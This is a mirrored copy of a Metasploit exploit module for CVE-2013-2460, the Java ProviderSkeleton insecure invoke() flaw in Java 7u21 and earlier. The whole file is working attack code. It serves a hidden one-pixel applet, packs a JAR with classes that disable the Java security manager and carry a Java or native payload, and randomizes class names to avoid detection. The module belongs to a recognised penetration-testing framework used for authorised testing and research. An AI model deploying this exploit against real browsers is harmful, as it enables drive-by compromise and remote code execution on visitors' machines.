Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/browser/java_jre17_provider_skeleton.rb
31927 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking # Because there isn't click2play bypass, plus now Java Security Level High by default

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10
  include Msf::Exploit::EXE

11


12
  include Msf::Exploit::Remote::BrowserAutopwn

13
  autopwn_info({ javascript: false })

14


15
  EXPLOIT_STRING = 'Exploit'

16


17
  def initialize(info = {})

18
    super(

19
      update_info(

20
        info,

21
        'Name' => 'Java Applet ProviderSkeleton Insecure Invoke Method',

22
        'Description' => %q{

23
          This module abuses the insecure invoke() method of the ProviderSkeleton class that

24
          allows to call arbitrary static methods with user supplied arguments. The vulnerability

25
          affects Java version 7u21 and earlier.

26
        },

27
        'License' => MSF_LICENSE,

28
        'Author' => [

29
          'Adam Gowdiak', # Vulnerability discovery according to Oracle's advisory and also POC

30
          'Matthias Kaiser' # Metasploit module

31
        ],

32
        'References' => [

33
          [ 'CVE', '2013-2460' ],

34
          [ 'OSVDB', '94346' ],

35
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpujun2013-1899847.html'],

36
          [ 'URL', 'http://hg.openjdk.java.net/jdk7u/jdk7u/jdk/rev/160cde99bb1a' ],

37
          [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-12.pdf' ],

38
          [ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-61.zip' ]

39
        ],

40
        'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },

41
        'Targets' => [

42
          [

43
            'Generic (Java Payload)',

44
            {

45
              'Platform' => ['java'],

46
              'Arch' => ARCH_JAVA

47
            }

48
          ],

49
          [

50
            'Windows x86 (Native Payload)',

51
            {

52
              'Platform' => 'win',

53
              'Arch' => ARCH_X86

54
            }

55
          ],

56
          [

57
            'Mac OS X x86 (Native Payload)',

58
            {

59
              'Platform' => 'osx',

60
              'Arch' => ARCH_X86

61
            }

62
          ],

63
          [

64
            'Linux x86 (Native Payload)',

65
            {

66
              'Platform' => 'linux',

67
              'Arch' => ARCH_X86

68
            }

69
          ],

70
        ],

71
        'DefaultTarget' => 0,

72
        'DisclosureDate' => '2013-06-18',

73
        'Notes' => {

74
          'Reliability' => UNKNOWN_RELIABILITY,

75
          'Stability' => UNKNOWN_STABILITY,

76
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

77
        }

78
      )

79
    )

80
  end

81


82
  def randomize_identifier_in_jar(jar, identifier)

83
    identifier_str = rand_text_alpha(identifier.length)

84
    jar.entries.each do |entry|

85
      entry.name.gsub!(identifier, identifier_str)

86
      entry.data = entry.data.gsub(identifier, identifier_str)

87
    end

88
  end

89


90
  def setup

91
    path = File.join(Msf::Config.data_directory, 'exploits', 'cve-2013-2460', 'Exploit.class')

92
    @exploit_class = File.open(path, 'rb') { |fd| fd.read(fd.stat.size) }

93
    path = File.join(Msf::Config.data_directory, 'exploits', 'cve-2013-2460', 'ExpProvider.class')

94
    @provider_class = File.open(path, 'rb') { |fd| fd.read(fd.stat.size) }

95
    path = File.join(Msf::Config.data_directory, 'exploits', 'cve-2013-2460', 'DisableSecurityManagerAction.class')

96
    @action_class = File.open(path, 'rb') { |fd| fd.read(fd.stat.size) }

97


98
    @exploit_class_name = rand_text_alpha(EXPLOIT_STRING.length)

99
    @exploit_class.gsub!(EXPLOIT_STRING, @exploit_class_name)

100


101
    super

102
  end

103


104
  def on_request_uri(cli, request)

105
    print_status("handling request for #{request.uri}")

106


107
    case request.uri

108
    when /\.jar$/i

109
      jar = payload.encoded_jar

110
      jar.add_file("#{@exploit_class_name}.class", @exploit_class)

111
      jar.add_file('ExpProvider.class', @provider_class)

112
      jar.add_file('DisableSecurityManagerAction.class', @action_class)

113
      randomize_identifier_in_jar(jar, 'metasploit')

114
      randomize_identifier_in_jar(jar, 'payload')

115
      jar.build_manifest

116


117
      send_response(cli, jar, { 'Content-Type' => 'application/octet-stream' })

118
    when %r{/$}

119
      payload = regenerate_payload(cli)

120
      if !payload

121
        print_error('Failed to generate the payload.')

122
        send_not_found(cli)

123
        return

124
      end

125
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })

126
    else

127
      send_redirect(cli, get_resource + '/', '')

128
    end

129
  end

130


131
  def generate_html

132
    html = %(

133
    <html>

134
    <body>

135
    <applet archive="#{rand_text_alpha(rand(3..7))}.jar" code="#{@exploit_class_name}.class" width="1" height="1"></applet>

136
    </body>

137
    </html>

138
    )

139
    return html

140
  end

141
end

142


143